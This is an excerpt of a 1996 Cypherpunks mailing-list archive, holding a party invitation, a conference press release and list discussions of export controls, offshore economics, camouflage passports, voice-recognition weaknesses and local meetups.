_succeeded_ in lowering peoples speed limits.  I personally drove
consistantly about 20-40km over the speed limit while this was in
effect, cuz I knew it sucked, but apparently I was in the minorty.

-Robin




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Wed, 14 Aug 1996 11:56:05 +0800
To: cypherpunks@toad.com
Subject: INVITATION
Message-ID: <Pine.SUN.3.91.960813165151.14951B-100000@crl2.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

Below, is the invitation to my next costume party.  Everyone on 
Cypherpunks is invited.  I hope to see a lot of you there.  The
last party was a HUGE success; this one should be even better.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


                     I'M NOT 50 YET!

             The Pleasure of Your Company is
               Cordially Requested at the:

                    Second Occasional
                    Anarcho-Dilettante
                Pick-Your-Own-Damned-Theme
                     Masquerade Ball
                 And Hallowe'en Rehearsal

                          7:00 PM
                     FRIDAY THE 13TH
                      September 1996
              650 Kenwyn Road (at McKinley)
                       Oakland, CA

         Lots of stuff happened on September 13th.
          We're not going to tell you which one
            to commemorate.  That's up to you.
          Check out the birthdays and historical
           events listed below.  Pick one or go
            with something else.  Your choice.

         But no matter what theme you pick, it's
           still a masquerade ball, so you MUST
           wear a costume (or at least a mask).
                      NO EXCEPTIONS

                    THE ENTERTAINMENT

         At 8:00pm there will be a Dance Recital
            featuring Rainbeau, Gracie, Tish,
           Blythe, Michelle and special guests.
              You DO NOT want to miss this.

         (Please, adults only. We regret that our
          house is very unsuitable for children.)

                       DOOR PRIZES

         Around Midnight, there will be a drawing
          for valuable and/or unique Door Prizes.
              (You must be present to win.)

                         THE EATS

       I'm poorer this time around, so don't expect
         a complete buffet as with past parties.
      There will be some snacks and soft drinks, but
       you are encouraged to bring things to share.
                    As always, BYOB

                         RSVP

            Whether or not you plan to attend,
            we need to hear from you.  Please
         give one of your hosts a call so we can
          plan on your presence OR your absence.

          Invited guests may bring other persons
         with prior approval of the hosts.  This
         means if there are people you would like
         to bring, call a host to get permission
                for each of those people.

                        THE HOSTS

         Head Anarchist in Charge, Sandy Sandfort
              510-839-3441/sandfort@crl.com

        House Hosts with the Most, Gracie & Zarkov
                510-832-2044/emyrt@aol.com

          Communications Officer, Sameer Parekh
                510-547-3617/sameer@c2.org


                 SEPTEMBER 13 IN HISTORY

Birthdays:

1755--Oliver Evans, pioneered high-pressure steam engine.
1766--Samuel Wilson ("Uncle Sam").
1851--Walter Reed, US Army physician (yellow fever work).
1857--Milton Hershey, candy maker.
1860--General John J. "Black Jack" Pershing, hero of WW I.
1876--Sherwood Anderson, US author ("Winesburg Ohio").
1894--J.B. Priestley, English critic, playwright, and
      novelist ("Lost Empires").
1905--Claudette Colbert (Claudette Chauchoin), actress.
1910--Chu Berry, saxophonist.
1916--Ronald Dahl, author ("Charlie and the Chocolate
      Factory").
1925--Mel Torme, singer.
1928--Ernest L. Boyer, educator.
1928--Robert Indiana, artist.
1937--Fred Silverman, TV producer.
1938--Judith Martin, "Miss Manners", author, journalist.
1939--Larry Speakes, former White House spokesman.
1944--Jacqueline Bisset, actress ("Rich and Famous").
1944--Peter Cetera, singer and songwriter.
1948--Nell Carter, actress.
1962--Cypherpunk, "Lucky Green."

On this day...

 122--Building of Hadrian's Wall began.
1592--Michel de Montaigne, French essayist, died.
1759--British defeated French at Abraham near Quebec City.
1759--James Wolfe, British General, died.
1788--Congress authorized the 1st US national election.
1788--New York City selected as location for US government.
1789--US received its first loan.
1803--Commodore John Barry, First American commodore who
      fought in the Revolutionary War, died.
1814--Battle over Ft. McHenry which inspired "The Star
      Spangled Banner."
1826--Rhinoceros 1st seen in NYC.
1899--1st automobile fatality.
1943--Chiang Kai-Shek became president of China.
1946--Ted Williams hit his only inside-the-park homer.
1946--Host Sandy Sandfort was -6 days old.
1950--70,000 UN troops landed at Inchon harbor (Korea).
1971--Attica State Prison stormed.
1983--Menachem Begin resigned as Israeli Prime Minister.
1988--Hurricane Gilbert hit the Caribbean.

            Another version of this invitation
             and a street map can be found at:

            http://www.c2.org/party/masquerade

P.S.  We love you so much, we want to make sure you do not
miss any of our party.  Therefore, you will be fined a
Sprint fee (10 cents a minute, "one minute, two minutes...)
for each minute you arrives after 8:00pm.  The party starts
at 7:00, so you get an hour for free.  The late fee money
will be used to defray costs.  (We're not kidding.  At the
last party, more than $100 was collected.)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: winn@Infowar.Com
Date: Wed, 14 Aug 1996 08:43:25 +0800
To: rschwa5846@aol.com
Subject: InfoWar Press Release
Message-ID: <199608132059.QAA17393@mailhost.IntNet.net>
MIME-Version: 1.0
Content-Type: text/plain


Information Warfare:

Electronic Civil Defense

NCSA Press Release
National Computer Security Association
10 South Courthouse Avenue
Carlisle, PA 17013 

For Information Contact:

Kevin Stevens - PRESSMarketing/CommunicationsNCSA(717) 258-1816 ext.
224(717) 243-8642 Faxemail: kstevens@ncsa.com	Robert Steele -
SponsorChairman & CEOOpen Source Solutions(703) 242-1701(703) 242-1711
Faxemail:ceo@oss.net	Winn Schwartau - SponsorPresident & CEOInterpact,
Inc.(813) 393-6600(813) 393-6361 Faxemail:winn@infowar.com

INFORMATION WARFARE: CONFERENCE ON ELECTRONIC CIVIL DEFENSE
September 4-5-6, 1996
Crystal Gateway Marriott Hotel
1700 Jeferson Davis Highway
Arlington, VA 22202

August 14, 1996; Carlisle, PA.  International security experts,
including military general officers responsible for C3I, intelligence
and security professionals from government agencies, and corporate
information assurance and security executives will review
state-of-the-art techniques in countermeasures necessary to combat
information warfare attacks against the information infrastructures of
the United States and allied nations.  Leaders from industry,
government and the international scene will also discuss policy options
for defense as well as response to attacks.

Information Warfare is likely to influence both military operations
other than war (OOTW), and the violent peace with which both law
enforcement and corporate security professionals must concern
themselves. Electronic Civil Defense for the 21st Century is the focus
of this conference.

Information Warfare represents a direct threat to governments,
financial and business information systems of corporations and private
businesses, and the personal privacy of ordinary citizens.  Information
Warfare is a relatively low cost method for less- developed
nation-states or underground organizations and trans-national gangs to
acquire technology, along with tactical and strategic economic
information, from more-developed nations, governments,
corporate/business entities, and individuals.  

Information Warfare is also a means for terrorists, criminals, or
politically-motivated splinter groups to attack their enemies.  Methods
for launching Information Warfare attacks can be done anonymously and
remotely, circumvent laws and detection, and employ an array of
clandestine electronic and human intelligence techniques.
 
Electronic Civil Defense is the guiding concept which unites all
aspects of a nation's information infrastructure into a unified
mindset.  It's purpose is to prepare for, and where necessary,
counteract the effects of organized and unorganized attempts on the
part of individuals, terrorist elements, criminal enterprises, or rouge
nations to subvert friendly nations, commercial institutions, and armed
forces through malicious destruction of critical information systems
assets such as banking, medical, or defense-related systems. 

The conference is sponsored by two internationally known experts: Mr.
Winn Schwartau (author of INFORMATION WARFARE: Chaos on the Electronic
Superhighway); and, Mr. Robert Steele (author of various works which
focus on the common theme of "Smart People, Dumb Nations: Bad
Business"), and by the National Computer Security Association (NCSA),
Carlisle, PA.

Speakers include: Dr. Peter Tippett, President, NCSA; Steve Katz, CISO,
Citibank; Sally Katzen, Administrator for Information and Regulatory
Affairs, OMB; Drs. Anders Eriksson and Peter Wallstroem, National
Defense Research Establishment, Dept. of Defense Analysis, Sweden; Dr.
Leroy Pearce, Canada; General Jim McCarthy, USAF (Ret); Capt. Gregory
Blackburn, Director of Information Warfare, OSD/C3I; Air Vice Marshall
Brendon O'Loughlin, Australian Defense Attaché; Ron Eward, Martech,
Inc.; Michael Logan, Federal Planning Associate, American Red Cross;
William W. Donovan, FEMA; Greg Brown, IBM Business Recovery Services;
Danielle Cailloux, Judge, Committee on Intelligence, Belgium; Col.
Charles Dunlap, Judge Advocate, USAF; and many more experts. 

To obtain detailed program and registration information, send a fax
with your return address, and fax number or email address to +(717)
243-8642 attn. Conference Registrar.  Download information from NCSA
Web Site at <http://www.ncsa.com>.  Send email to <infowar@ncsa.com>,
or if a CompuServe member, GO NCSA.

PRESS ADVISORY:  Press passes for the conference are available for $100
- luncheon included. Fax or email requests for press passes to: Kevin
Stevens, <kstevens@ncsa.com>, Marketing/Communications, NCSA.  Proof of
press credentials, including photo identification, are required.


<----  End Forwarded Message  ---->

Peace
Winn

		        Winn Schwartau - Interpact, Inc.
		        Information Warfare and InfoSec
		       V: 813.393.6600 / F: 813.393.6361
			    Winn@InfoWar.Com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rich@c2.org>
Date: Wed, 14 Aug 1996 10:51:16 +0800
To: cypherpunks@toad.com
Subject: The Ostrich Method of dealing with ITAR: PGP from OnNet
Message-ID: <199608132359.QAA27531@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

This message is sent from an evaluation version of FTP OnNet32 2.0, which has PGP-
compatible encryption built-in.

This software is distributed from http://www.ftp.com/mkt_info/onnet32/mail/mail_dl.htm
which doesn't have a hell of a lot as technical enforcement of ITAR goes.

You may download the software through the Anonymizer, www.anonymizer.com,  if you
wish.

Unfuckingbelievable.

By the way, encrypting and decrypting large messages with OnNet is about 10 times
faster than with Private Idaho/PGP for DOS on my P6-200 running NT 3.51. The
user interface is pretty good, too.

Somebody pinch me.

- -rich

-----BEGIN PGP SIGNATURE-----
Version: 2.9

iQBVAgUBMhEXDJNcNyVVy0jxAQHDXQH/aQSrU3ZqhOJXGanSDnS/o+DdsH2GMKcI
6A8J3cGZAZ3ESK30GxwozdHpBjJRHIww4i/rrxK9aBNpzm/vQnovXg==
=8dGx
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paolo Da Ros <daros@cryptonet.it>
Date: Wed, 14 Aug 1996 07:06:11 +0800
To: e$@thumper.vmeng.com
Subject: Re: National Socio-Economic Security Need for Encryption
Message-ID: <199608131554.RAA03474@relay.cryptonet.it>
MIME-Version: 1.0
Content-Type: text/plain


At 07.54 11/08/96 -0400, you wrote:
>Forwarded by Robert Hettinga
>
>-----------------------------------------------------------------------
>X-Sender: amehta@giasdl01.vsnl.net.in
> Mime-Version: 1.0
> Date: Sun, 11 Aug 1996 10:17:31 +0600
> To: cypherpunks@toad.com
> From: Arun Mehta <amehta@giasdl01.vsnl.net.in>
> Subject: Re: National Socio-Economic Security Need for Encryption
>   Technology
> Sender: owner-cypherpunks@toad.com
> Precedence: bulk
>
>
>At 02:05 10/08/96 -0700, Timothy C. May wrote:
> >At 12:15 PM 8/10/96, Scottauge@aol.com wrote:
> >>I was watched CBS reports a couple nights ago about how all these blue
collar
> >>and now white collar jobs are going across seas.
> >
> >Where do I begin? First, what does "taking jobs away from us" mean? That we
> >own these jobs? And who is "us"?
> 
> Well said. 

Sure. jobs belong to people which are the more competitive to perform them
(which ask less to do the some job or ask the same to do a better job).
Since markets are going to be "global", as a consumer or a reseller I can
buy wherever I want whatever I want -well, almost, and crypto, remailers etc
can help-. 
The improvements in the competitive position of US economy have one of their
roots in the loss of purchase power by the american workforce (less to do
the same job, or the same to do a better job).
This is something I guess Germans are going to experience.
In Italy there is an old tradition of using devaluation as a competitive
mean (ask the french government and french industrialists what they thought
after the IT Lira lost 30% in  a few months, back in 1992-3).  

> 
> >>So a possible way to protect jobs is to protect the knowledge on how to do
> >>them.

I don't think it's possible to "protect jobs". This translates into blocking
the market mechanisms, which constantly, by mean of the competition, push
toward better quality, lower prices and/or new products. Right or wrong,
market wins. If ideas are worth money, they spread.

To confirm the simmetry of politics on the two sides of the pond, I was told
the US right (newt gingrich) has on this issue the same idea here in Italy
is supported by the far left (the Rifondazione Comunista party). The idea is
to make mandatory a label on every third world product which states the
amount of child labor embedded in the product. 
I see in this "moral" approach to economy two possible outcomes: the first
is that nobody buys such products, (the goal of the proposal) based on child
exploitation (and so the child is not exploited anymore, and starves to
death while smiling to his first world "friends"); the second is that lots
of people buy the product not because of its features, price etc, but to
help the poor child. In this way, the moral approach to economic issues has
two immoral possible outcomes (I enjoy these paradoxes, it's one of the few
things I still like of Marx).

The problem is that there are millions of hungry people, and a simple
solution is not available. Who says he has it is a liar.

> 
> To some extent this happens automatically -- for instance, if you
> live in the Silicon valley, your knowledge levels are higher on
> account of higher frequency of user meets, conferences, etc. But,
> to the extent you use the Internet as an information source, it
> is available internationally. So you cannot have it both ways:
> use an open forum like the Internet, and hope to keep knowledge bottled in.

The only choice we first world citizens have is to run faster, try to invent
new products or new ways to produce old products.  I have been told that the
quality of eastern europe programmers is very high, and we cannot compete
with people which makes one tenth or less than we do (well, we CAN compete,
if we accept to make the same...).

BTW, from the very little I know about some members of this list, it looks
like they are "creme de la creme": very bright people, wide vision of the
issues, eclectic culture (at least two of the brightest of them share my
love for LISP machines, so my ego gets comforted...), and constant research
of the best market position for themselves. Unfortunately, individuals can
easily switch and try to improve their position, national economies have a
far bigger momentum to win to achieve the same result. Besides, if everybody
could so easily switch, the improvement -a higher relative position- could
not exist at all.

> 
> In earlier generations of computing, monopolistic organizations
[snip]
> projects such as Iridium, Odyssey, Teledisc and Globalstar
> threaten to change all this, little impact will be felt until the
> end of the decade. In any case, telecom facilities in the
> industrialized countries will most likely continue to be
> considerably superior, providing workers there with an ongoing
> competitive advantage.

This is an extra-optimistic view. In  one of my previous job at a very large
European system integrator, three years ago, I was told that "SW projects
used to be 7 years long, are 7 months long, and we shall prepare for the
moment when they will be 7 days long". So workers there will have a
competitive advantage (perhaps) at doing a shrinking amount of work. 
Given their age, many members of the list are accustomed to shrinking
markets and new skills acquisitions (see Artificial Intelligence back in the
80s), as is possible to understand from the fact that they are positioned in
one of the hottest spots in one of the fastest growing markets. So I assume
many are familiar with the job-kiling role of technology. The competitive
disadvantage of industrialized countries workers is provided by these
workers themselves when they put competitive advantage of their know-how in
new products or technologies.


> 
> Further, as economists such as Paul Krugman point out, developing
> countries lack the means for sustained growth ("Which Asian
> Model?", Newsweek, November 20, 1995). Those economies that have

I wouldn't trust a newsmagazine on such a critical topic. And (hope you
don't take this as a chauvinistic european statement) expecially NOT an
American newsmagazine. Nice photos, poor content.

> shown dramatic growth, such as the East Asian, have relied
> essentially on low-cost inputs, rather than on their efficient

If you know how many are the chinese, you could come to the conclusion that
as soon as they improve their agricolture, HUNDRED MILLIONS low-cost people
(input?) are available to exploit new markets. So, low cost input shortage
is not an issue.
Yes, their economic model could reach a critical point when they reach, say,
a 6K$ gdp pro capita, but by then their gdp should be 1.200.000.000 * 6.000
US$, i.e. 7.2 trillion US$. (today their GDP pro capita should be around
900US$, i.e 1.08 TrnUS$, growing at 10% per year)

> utilization. Professor Alwyn Young of Boston has in fact come to
> the surprising conclusion that Singapore's total factor

very surprising indeed. If I'm not wrong, singapore has a GDP pro capita
around 12K$. And productivity is what defines the GDP. Should productivity
in Singapore really be so low, I can't understand how capital intensive
industries (semiconductors, for instance) could have been established there
by so well managed western companies like HP or TI etc

> productivity (which measures such efficiency) is so poor as to be
> comparable to that of the Soviet Union. He points out that "at
> just the time that everybody was ranting about how magnificent
> Japan was, it ceased to catch up."

Well. yen was at 300. Now it is at 108. It means that to buy -say- fine
Californian Wine -apart from customs, which is an issue, of course- a few
years ago a japanese blue collar had to spend -say- 2 hours. Now 40 minutes
(the example is not very good, but should explain my thinking).

> 
> Cheap inputs is not a long-term phenomenon, as companies looking
> for good programmers in India are increasingly discovering.
> Programmer salaries in India are rapidly rising. While many
> youngsters are keen to become programmers, India lacks adequate

the real killer here is technology, not low-cost programmers from India.
All the recent emphasis on Intranets is emphasis on a dramatic
standardization of everyting; GUI, security, infrastructure, access to data
etc. Standardization means better productivity, and productivity is "less
people to do the same job".


[snip]
> >>Perhaps there is a larger picture in the world that the cyperpunks mailing
> >>list is missing.  That cryptography is not just for personal privacy, but
> >>could involve job security also - as a matter of fact, the income base for

Job security doesn't exist. There used to be in eastern europe, but it
didn't work. Job security output were Trabants (funny east german cars) or
poor quality state restaurants.

> >>this whole country.

I think the picture is far larger than that of the simple right to the
privacy. You don't care of your privacy when your stomach is empty, and
there is too much people with his stomach empty. So, many things will change
as many poor people become richer and many middle(or low) -income people
become poorer. 

I think one of the things which will have an impact on this change is going
to be the net, and crypto is a net-enabler (uno of the most important, I
would say). So, cypherpunks are going to be exposed to all the important
things to happen. I don't think they alone will be in the position to change
nothing, but they will bring an informed point of view in the discussion.

I once dreamed to change the world, or at least to control the way things
had to go. Now the situation is so complex that I could feel satisfied just
being able to understand what's happening and how we will face change. My
enrollment in this list is because lots if bright people submit ideas on the
topic here, and this is of the greatest value.

> 
[snip]
> 
> My prediction is that with the blessings of the Internet, the
> next generation of multiracial programmers, even those that were
> born in the USA, will be more likely to be found on the beaches

I'm not sure there will be something like "the next generation of
programmers". Not in the sense world is going to end, but in the sense that
possibly, in the new world which is coming to birth in these years, there
will be no need of programmers (but a few hundreds of them...).


> of tropical islands than in the fog of San Francisco. When you
> can work in the shade of a palm tree, even if you should earn
> less, it's worth it :-)
> 
> Arun Mehta Phone +91-11-6841172, 6849103 amehta@cpsr.org
> http://www.cerfnet.com/~amehta/  finger amehta@cerfnet.com for public key
> 
>
>
>--------------------------------------------------
>The e$ lists are brought to you by:
>
>Take Your Business Online with Intertrader Ltd, Edinburgh, U.K.
>Visit http://www.intertrader.com or email info@intertrader.com
>
>Making Commerce Convenient (tm) - Oki Advanced Products - Marlboro, MA
>Value-Checker(tm) smart card reader= http://www.oki.com/products/vc.html
>
>Where people, networks and money come together: Consult Hyperion
>http://www.hyperion.co.uk                    info@hyperion.co.uk
>
>See your name here. Be a charter sponsor for e$pam, e$, and Ne$ws!
>See http://thumper.vmeng.com/pub/rah/ or e-mail rah@shipwright.com
>for details...
>-------------------------------------------------
>
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "<pstira@escape.com>" <pstira@escape.com>
Date: Wed, 14 Aug 1996 09:00:57 +0800
To: cypherpunks@toad.com
Subject: Re: photographed license plates
In-Reply-To: <Pine.SUN.3.91.960810194513.13080C-100000@tipper.oit.unc.edu>
Message-ID: <Pine.BSI.3.91.960813174438.12576B-100000@escape.com>
MIME-Version: 1.0
Content-Type: text/plain



For anybody with interest in this happening in the U.S., please note that
such a practice (cameras and speed tracking devices, resulting in tickets 
being sent to the offending party) has been talked about, in somewhat 
closed circles, for years.  A couple of years ago, 2600 Magazine ran an 
article listing most of the intersections with said devices.  You can 
probably find it in their web page's index of back issues to pick it up.
(http://www.2600.com).

ObCrypto: Has anyone had any experience working with the Sidewinder 
Firewall and encryption and/or S/key or SecurID?  What are drawbacks with 
using DESlogin with a firewall?  or any encrypted transmissions for that 
matter?  Is there anyway to bypass the obvious (sniffing).

Thanks :)
Millie, from her boyfriends account :)
sfuze@sunspot.tiac.net

"Remailers? Why bother? These days they'll find you no matter WHAT you use."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "<pstira@escape.com>" <pstira@escape.com>
Date: Wed, 14 Aug 1996 09:11:30 +0800
To: Vincent Cate <vince@offshore.com.ai>
Subject: Re: Anguilla / taxbomber - legality
In-Reply-To: <Pine.LNX.3.91.960811004757.1724B-100000@offshore>
Message-ID: <Pine.BSI.3.91.960813175054.12576C-100000@escape.com>
MIME-Version: 1.0
Content-Type: text/plain


I have never, nor do I ever plan to, use any sort of documentation other 
than that which this police state shoves down my throat, but I do wish to 
point something QUITE OBVIOUS out, which is that MANY places sell camoflauge
passports, including Delta Press, several "police supply catalogs", 
alternative book catalogs (Such as Eden Press, which I *know* some of you 
have used, judging by your explosives knowledge ;)), and so on.  There is 
NO reason to single out taxbombers site for camo passports.  They *do* 
have legitimate usages, including terrorist situations when you don't 
want to be identified as an American (on a plane hijacking for example, 
American's are "white meat", because our country understands and responds 
to public sympathy much more than most -- whatever THAT means).  What I 
am trying to get at is that camoflauge passports are NOT illegal -- they 
are for countries which no longer exist and are unusable at customs, at 
any foreign checkin point, and so on.  They have specific usages, and 
specific reasons for being cheap (running between 50 to 500 bucks, tops).

The other passports?  Go to most 2nd or third world countries, offer to 
buy so much land, and I'd be surprised if you don't walk away with some 
sort of official documentation.  There's a difference between being a 
broker (which it is my understanding taxbomber is) and being a forger or 
smuggler.  But then, I do not know the parties in question and can only 
make assumptions.

Loompanics has several books about getting foreign passports. for a bunch 
of people who do not care for the lack of freedom in encryption, privacy, 
etc, you sure seem like (pardon my phrasing) hard-asses when it comes to 
other peoples much of the time... :)

What's that saying about liberty not going away all at once, but being 
nibbled away, for expedience and by parts?

Millie, from her boyfriends account.
(if you have a beef with me, send it to
sfuze@sunspot.tiac.net -- otherwise, have a nice day :))






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "<pstira@escape.com>" <pstira@escape.com>
Date: Wed, 14 Aug 1996 09:14:43 +0800
To: Rabid Wombat <wombat@mcfeely.bsfs.org>
Subject: Re: Massively parallel carbon-unit-based voice pattern matching
In-Reply-To: <Pine.BSF.3.91.960811185455.24521B-100000@mcfeely.bsfs.org>
Message-ID: <Pine.BSI.3.91.960813180607.12576D-100000@escape.com>
MIME-Version: 1.0
Content-Type: text/plain


This CAN be infiltrated. (1) take into account line noise. (2) take into 
account recordings, cut and paste, and hell, audio programs are 
INCREDIBLE nowadays. (3) take into account problems like illness, which 
changes voice, inflection, etc., like puberty (hehe, no comment), like 
just about anything which requires some range or variability.

This seems to be about as secure, remotely, as NFS <G>.

Ta,
Millie, from my b/friends accout.
bug me, not him:   sfuze@tiac.net






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Wed, 14 Aug 1996 11:29:35 +0800
To: Sandy Sandfort <sandfort@crl.com>
Subject: RANT re: National Socio-Economic Security Need for Encryption
In-Reply-To: <Pine.SUN.3.91.960813081445.17718D-100000@crl10.crl.com>
Message-ID: <Pine.SOL.3.91.960813181223.17545A-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 13 Aug 1996, Sandy Sandfort wrote:
> 
> 
> In my experience, Americans are loathe to invest money overseas
> unless it is highly profitable.  The reason is obvious.  They
> understand--or think they understand--the rules here.  In 
> historical terms, US investments have been more stable and safer
> than investments overseas.  (Which is why, by the way, that the
> US is the worlds largest tax haven in the world, but I digress.)
>

Which is why it is possible to be angry about NAFTA and the Mexican 
bailout without being a protectionist.

Why should I pay taxes to my government so it can protect capital 
investments in Mexico, thereby reducing one of my selling points as an 
American worker?

... and while I'm ranting...

Can somebody explain why:

1. Good jobs of the future are knowledge jobs which require little 
capital investment.

and

2. We need a capital gains tax cut to encourage capital investment to 
stimulate the growth of good jobs of the future.

?

bd
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Checkered Daemon <cdaemon@goblin.punk.net>
Date: Wed, 14 Aug 1996 12:12:46 +0800
To: bdolan@use.usit.net (Brad Dolan)
Subject: Re: RANT re: National Socio-Economic Security Need for Encryption
In-Reply-To: <Pine.SOL.3.91.960813181223.17545A-100000@use.usit.net>
Message-ID: <199608140124.SAA14313@goblin.punk.net>
MIME-Version: 1.0
Content-Type: text/plain


Brad Dolan asks:
 
> ... and while I'm ranting...
> 
> Can somebody explain why:
> 
> 1. Good jobs of the future are knowledge jobs which require little 
> capital investment.
 
a)  Knowledge jobs require tremendous capital investment, as in degrees,
training, continual updating of skills, etc.  If the knowledge  worker
cannot recoup these investment costs via a higher salary, she will not
invest in the training.

b)  Knowlegde jobs require computers, automation equipment, etc. for the
knowledge to be applied to in order to create wealth.  These also require
capital investment.

c)  As rote manufacturing jobs are replaced by "quasi-intelligent" machinery,
human job focus switches to designing, caring for, and replacing those machines.
Example:  The ATM replaces the bank teller, requiring new jobs in ATM design,
manufacturing, repair, and the control of the computer network in the back-
ground.

Good jobs of the future may be knowledge jobs, but they require tremendous
capital investment, both by employee and employer.
 
> 2. We need a capital gains tax cut to encourage capital investment to 
> stimulate the growth of good jobs of the future.
 
In theory, this results in less spending and more saving.  More saving 
results in more investment capital (instead of spending on consumption),
lowering borrowing costs and resulting in business expansion, stimulating
both hiring and salaries to grow (at least until the Federal Reserve gets
into the act).

The second argument is that corporate earnings are actually taxed twice,
once at the  corporate level, and again when they are distributed to
share-holders as either dividends or as capital gains.

In actual practice, well, your mileage may vary.  For further info, see
any Macro Economics 101  textbook.

-- 
Checkered Daemon                              cdaemon@goblin.punk.net

Delirium:  There must be a word for it ... the thing that lets you know that
           TIME is happening.  IS there a word?
Sandman:   CHANGE.
Delirium:  Oh.  I was AFRAID of that.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: geoff@commtouch.co.il (geoff)
Date: Wed, 14 Aug 1996 05:26:36 +0800
To: cypherpunks@toad.com
Subject: Fw: Re: Free Pronto Secure Offer
Message-ID: <19960813152643711.AAA272@[194.90.26.157]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To: cypherpunks@toad.com
Date: Tue Aug 13 18:39:12 1996

on Aug 13 Sean Sutherland wrote:

> Whatever happened to that free offer for ProntoSecure for members of
> the Cpunk list?  Remembered hearing something about it awhile back, 
> but I don't know exactly what it is.  Thanks.

The offer is still on. A free copy of Pronto Secure in exchange for 
feedback. Open to anyone on the c'punk list.

http://www.commtouch.com/p1.htm         for download.
http://www.commtouch.com/testers.htm    for users' impressions.
http://www.commtouch.com/s-mail.html    for description.

Announcement:   Effective immediately.  New list price for Pronto 
- ------------    Secure is $99.  Contact secure@commtouch.com if  
                group discounts required.



- ---------------------------------------------------------------
Geoff Klein, Pronto Secure Product Manager;   www.commtouch.com 
My PGP public Key 1814AD45 can be obtained by sending a message
to geoff@commtouch.co.il with "Get PGP Key" as the subject.
- ----------------------------------------------------------------

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQCVAwUBMhChpkLv5OMYFK1FAQFE/gP+NVaU5a+fdU5YuGLPDrD02DuXgfc/skZP
sKUuE2yJcBV1N7ITjWJEkf98hgWr688G71lJ2+1JGob1bLBF5bBDT3M2ag5eX5Dl
dARvhjtcU4+bDxOrnOsJ4wlAyTZ1WmfmaDoe5IPKdgAu+6gTDS+3dq31vm2oFaud
/2qazWTTUwA=
=jFNk
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "<pstira@escape.com>" <pstira@escape.com>
Date: Wed, 14 Aug 1996 09:52:38 +0800
To: Ben Combee <combee@sso-austin.sps.mot.com>
Subject: Re: [NOISE] Geek Apartments
In-Reply-To: <9608131541.AA26416@sso-austin.sps.mot.com>
Message-ID: <Pine.BSI.3.91.960813182541.20862A-100000@escape.com>
MIME-Version: 1.0
Content-Type: text/plain


Hmm... My old school (Stevens Institute of Technology) did this LONG 
before 94... Before 90, in fact :)

Just a point of reference. (brag brag brag)... Incidentally, there was a 
REASON it wasn't a neccessarily good idea -- the dropout/flunkout rate 
was astronomical from everyone netting long before netting was pop-oo-lah.

:)
Millie.
sfuze@tiac.net
write me at the above address, not the one this is written from :)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vincent Cate <vince@offshore.com.ai>
Date: Wed, 14 Aug 1996 10:21:01 +0800
To: "<pstira@escape.com>
Subject: Re: Anguilla / taxbomber - legality
In-Reply-To: <Pine.BSI.3.91.960813175054.12576C-100000@escape.com>
Message-ID: <Pine.LNX.3.91.960813183116.10632A@offshore>
MIME-Version: 1.0
Content-Type: text/plain





On Tue, 13 Aug 1996, <pstira@escape.com> wrote:
> What I 
> am trying to get at is that camoflauge passports are NOT illegal -- 

They may not be illegal in the USA (yet?) but my lawyer says they
are illegal in Anguilla.  This is a different country.  We do have
our own laws. 

  --  Vince
 
-----------------------------------------------------------------------
Vincent Cate   vince@offshore.com.ai  http://www.offshore.com.ai/vince/
Offshore Information Services         http://www.offshore.com.ai/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joey Grasty" <jgrasty@gate.net>
Date: Wed, 14 Aug 1996 09:46:09 +0800
To: cypherpunks@toad.com
Subject: South Florida Cypherpunks Meeting Reminder
Message-ID: <199608132238.SAA52914@osceola.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


Y'all:

The South Florida Cypherpunks will meet at Hops Grill & Bar
in Boynton Beach, FL on Saturday, August 17 at 2:00 PM.  As
always, our meeting place is at a microbrewery, and this one
has some very fine brews.

Jim Ray will show off his Snake Oil bottle, signed by Phil
Zimmermann, who wrote PGP.  I will also hand out copies of my
WinSock Remailer to anyone who wants to check it out.  Other than 
that, we have no agenda, other than discussing cypherpunkology 
and drinking some fine brews.

Directions:

Take I-95 to Boynton Beach Blvd and go west.  When you get
to Congress Ave., turn right (north) and go one stoplight 
until you get to Old Boynton Beach Blvd.  Turn left (west)
and go behind Longhorn Steakhouse and turn right into
the parking lot behind Longhorn Steakhouse.  Hops is just
north of Longhorn on Congress Ave.

  Hops Grill & Bar
  545 N. Congress Ave.
  Boynton Beach, FL.

In addition, the Cypherpunks Brewmaster, Jim Ray, is brewing 
up a special "cypherpunks summer dark" brew for the meeting.  (I
sampled some of the brew before bottling, and BBBUUURP! it was
good.)  We will enjoy his fine beer at my house following the 
meeting.  I'll pass out maps to my house in Deerfield Beach
for anyone who wants to go.

Please send me a note if you plan to attend so that I can alert
the restaurant on how many will attend.  Send me your
key and fingerprint for keysigning if it hasn't been signed by any
cypherpunks before.

Regards,


--
Joey Grasty
